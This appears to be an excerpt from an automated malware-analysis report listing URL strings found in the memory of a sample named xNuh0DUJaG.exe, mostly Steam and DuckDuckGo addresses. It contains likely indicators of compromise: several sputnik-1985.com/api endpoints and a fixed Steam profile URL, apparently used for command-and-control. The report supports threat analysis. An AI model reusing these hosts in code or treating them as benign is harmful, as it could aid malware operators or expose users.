            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sputnik-1985.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sputnik-1985.com/api
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sputnik-1985.com/apiOSCz
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sputnik-1985.com/apie
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sputnik-1985.com/apieB
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/p
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304472180.000000000054F000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541782028.000000000019A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304472180.000000000054F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900419R
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
